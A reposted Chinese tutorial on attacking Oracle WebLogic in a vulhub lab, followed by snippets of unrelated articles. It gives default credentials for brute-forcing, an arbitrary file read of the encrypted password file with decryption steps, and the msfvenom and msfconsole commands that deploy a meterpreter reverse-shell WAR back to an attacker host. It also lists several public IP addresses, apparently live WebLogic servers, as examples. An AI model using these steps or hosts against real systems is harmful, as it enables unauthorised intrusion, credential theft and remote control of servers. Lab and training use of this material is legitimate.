WebLogic:弱口令,木马反弹连接

weblogic

WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等

常见版本:

WebLogic Server 10.x  http://94.101.140.201:7001/
WebLogic Server 11.x   http://64.44.157.94:7001/
较为少见 12 和 8 版本
12: http://124.128.249.189:7001/
8: http://129.126.221.67:7001/

默认服务端口:7001

vulhub靶场使用

vulhub:多个靶场的集合

1.关闭防火墙

systemctl stop firewalld.service 

2.关闭selinux系统防护[详细见主页]

setenforce 0

3.开启docker服务

systemctl restart docker.service 

4.进入vulhub靶场目录

cd /var/local/vulhub-master/weblogic/weak_password

5.开启靶场[后台开启]

docker-compose up -d

6.查看靶场信息

[root@localhost weak_password]# docker ps
CONTAINER ID   IMAGE                           COMMAND              CREATED          STATUS          PORTS                                                                                  NAMES
5ebeb02ea02a   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   54 minutes ago   Up 54 seconds   0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   weak_password_weblogic_

7.访问靶场 

http://192.168.10.5:7001/

8.关闭靶场[切换至靶场目录下]

 docker-compose stop

[root@localhost weak_password]# docker-compose stop
Stopping weak_password_weblogic_1 ... done

9.切换靶场 [报错重复步骤1~3]

[root@localhost weak_password]# cd ..
[root@localhost weblogic]# ls
CVE-2017-10271  CVE-2018-2628  CVE-2018-2894  CVE-2020-14882  CVE-2023-21839  ssrf  weak_password
[root@localhost weblogic]# cd ssrf/
[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done
[root@localhost ssrf]# 

弱口令爆破

weblogic弱口令:

用户名密码
systempassword
weblogicweblogic
adminsecruity
joepassword
marypassword
systemsercurity
wlcsystemwlcsystem
weblogicOracle@123

1.抓取数据包

2.发送攻击者模块,攻击模式:pitchfork

3.标记载荷,导入弱口令

 

4.开始爆破

 5.拿到用户信息并登录

任意文件读取[应用程序漏洞读取weblogic密码] 

通过漏洞读取weblogic密钥及密文,使用AES解密出后台密码

密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
rializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/con
fig.xml

漏洞接口路径:

http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd

使用bp获取密文并解密

1.抓取接口数据包
2.改为密码密文路径,获取响应

        请求:

        响应:

3.响应视图修改为 Hex ,选中乱码部分的16进制数据,右键保存为.dat文件

 

4.读取配置文件,保存密钥

config.xml是base_domain的全局配置文件

其中<node-manager-password-encrypted>标签的值为"密钥"

5.下载解密工具,进行解密
地址:https://github.com/TideSec/Decrypt_Weblogic_Password
工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt

扩展:使用.bat脚本快速启动工具

创建.bat文件将其保存至工具目录

@echo off
echo Starting the weblogic_decrypt.jar application...
java -jar weblogic_decrypt.jar
echo Application has ended. Press any key to exit.
pause > nul

建立反弹连接

1.kali使用msf生成木马

msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war

2.将木马部署入服务器

点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成

 

3.监听连接端口

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.128
set LPORT 4444
exploit

 

4.访问木马路径,建立连接

http://192.168.10.5:7001/java

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/3281767.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

CentOS通过rsync实现文件同步(daemon方式)

rsync介绍 rsync是Liunx下的远程数据同步工具&#xff0c;可快速同步多台服务器间的文件和目录&#xff0c;并可实现增量同步以减少数据的传输。 rsync有两种常用的认证方式&#xff0c;一种是rsync-daemon方式&#xff0c;另外一种是ssh方式。 daemon 方式与 ssh 方式相比有…

Docker 搭建 Minio 容器

Docker 搭建 Minio 容器 (完整详细版) 简介&#xff1a; Minio 是一个基于Apache License v2.0开源协议的对象存储服务&#xff0c;虽然轻量&#xff0c;却拥有着不错的性能。它兼容亚马逊S3云存储服务接口&#xff0c;非常适合于存储大容量非结构化的数据。 例如图片、视频、日…

【获取Jmeter中正则获取的数据】

获取参数值保存在本地 Jmeter获取参数保存本地【三步走策略】【一】正则表达式提取器【二】BeanShell 后置处理程序【三】执行看结果 Jmeter获取参数保存本地【三步走策略】 节省人工成本之获取参数值保存本地 【一】正则表达式提取器 【二】BeanShell 后置处理程序 FileWri…

归并排序 python C C++ 图解 代码 及解析

一&#xff0c;概念及其介绍 归并排序&#xff08;Merge sort&#xff09;是建立在归并操作上的一种有效、稳定的排序算法&#xff0c;该算法是采用分治法(Divide and Conquer&#xff09;的一个非常典型的应用。将已有序的子序列合并&#xff0c;得到完全有序的序列&#xff…

下载安装docker并解决拉去镜像的connect:connection refused问题(2024.7.31亲测有效)

原文链接&#xff1a;使用国内链接安装最新docker 最近dockerhub已经不能访问了&#xff0c;使用原先的方式安装docker&#xff0c;服务器上也总是连接不上&#xff0c;所以找了种可以在国内正常安装新版docker的方式 适用系统&#xff1a;centos7 先删除本机旧的或者残留的…

书生大模型实战营闯关 - 8GB显存玩转书生大模型demo

创建开发机 创建一个使用10%GPU算力&#xff0c;cuda12.2系统的开发机&#xff0c;并启动。由于开发机的IO性能较差&#xff0c;开发机共享盘中已经创建好了本次实验所需要的conda环境 # 启动共享的conda环境 conda activate /root/share/pre_envs/icamp3_demo部署cli模型 创…

Python安装与环境配置,2024最新,超详细保姆级教程!

安装Python 来到Python官网&#xff1a;https://www.python.org/ Downloads>Windows&#xff1a; 选择想要的版本后点击进去&#xff1a; 下载后点击安装&#xff1a; 在本地电脑输入命令提示符&#xff1a;winR 环境变量配置 若执行命令提示符&#xff0c;输入Python后&…

网工必装软件,SecureCRT从零到精通,不可错过

号主&#xff1a;老杨丨11年资深网络工程师&#xff0c;更多网工提升干货&#xff0c;请关注公众号&#xff1a;网络工程师俱乐部 中午好&#xff0c;我的网工朋友。 相信在平时的日常工作中&#xff0c;大家经常需要通过安全的方式远程访问各种设备和服务。SecureCRT作为一款强…

SSM大学生体质管理系统-计算机毕业设计源码75960

摘要 基于SSM的大学生体质管理系统是一款综合性平台&#xff0c;融合了在线课程、健康知识、体测报告等多项功能&#xff0c;旨在为广大大学生提供全方位的健康管理服务。通过在线课程和健康知识模块&#xff0c;用户可以随时学习健康知识&#xff0c;掌握科学的健康管理方法&a…

前端面试宝典【设计模式】【1】

欢迎来到《前端面试宝典》,这里是你通往互联网大厂的专属通道,专为渴望在前端领域大放异彩的你量身定制。通过本专栏的学习,无论是一线大厂还是初创企业的面试,都能自信满满地展现你的实力。 核心特色: 独家实战案例:每一期专栏都将深入剖析真实的前端面试案例,从基础知…

C语言典型例题19

《C程序设计教程&#xff08;第四版&#xff09;——谭浩强》 例题2.7 检查浮点型数据的舍去误差 C语言知识&#xff1a; 浮点数在C语言用有两个类型&#xff0c;有float和double类型&#xff0c;其中double类型的数据精度更高 解题思路&#xff1a; 可以将一个double类型的…

根据需求修改el-tab的默认样式

根据需求修改el-tab的默认样式 样式代码&#xff1a; <style lang"scss" scoped>//去掉了最下面的那条线:deep(.el-tabs--card > .el-tabs__header){border-bottom: none}//单独给每一项添加下边框、修改背景色:deep(.el-tabs--card > .el-tabs__heade…

【Golang 面试 - 基础题】每日 5 题(九)

✍个人博客&#xff1a;Pandaconda-CSDN博客 &#x1f4e3;专栏地址&#xff1a;http://t.csdnimg.cn/UWz06 &#x1f4da;专栏简介&#xff1a;在这个专栏中&#xff0c;我将会分享 Golang 面试中常见的面试题给大家~ ❤️如果有收获的话&#xff0c;欢迎点赞&#x1f44d;收藏…

redis集群(高可用)

redis集群&#xff08;高可用&#xff09; redis集群的三种模式 主从复制 奇数 3台 1主2从 哨兵模式 3台 1主2从 cluster 集群 6台 生产中&#xff1a;333 9台 主从复制&#xff1a; 和MySQL的主从复制类似&#xff0c;主可以写&#xff0c;写入主的数据通过RDB方式把数据…

ft232 win10驱动

ft232 win10驱动 https://ftdichip.com/drivers/d2xx-drivers/

Qt for MCUs 2.8 LTS已发布

本文翻译自&#xff1a;Qt for MCUs 2.8 LTS released 原文作者&#xff1a;Qt Group高级产品经理Yoann Lopes 我们很高兴地宣布Qt for MCUs 2.8 LTS版本已发布&#xff0c;该版本带来了激动人心的新变化&#xff0c;如GUI的构建模块、构建工具工作流程的改进、对Infineon TRA…

excel如何绘制多列数据的折线图

1.注意表中的数据必须是数据类型的&#xff0c;不能是字符串格式的。如果是用python生成的&#xff0c;需要填充int或者float型的数据。 2.选择数据&#xff08;多列数据的选择&#xff0c;可以按住ctrl键后选中多列&#xff09; 2. 选择插入 3.选择 推荐的图表->所有图表…

PostgreSQL——查询扫描介绍

顺序扫描 概述 顺序扫描&#xff08;Sequential Scan&#xff09;是PostgreSQL中一种基本的数据检索方式&#xff0c;它通过按顺序读取表中的所有页面来查找满足查询条件的记录。这种方式不依赖于索引&#xff0c;因此在某些情况下可能是唯一的选择&#xff0c;尤其是当表没有…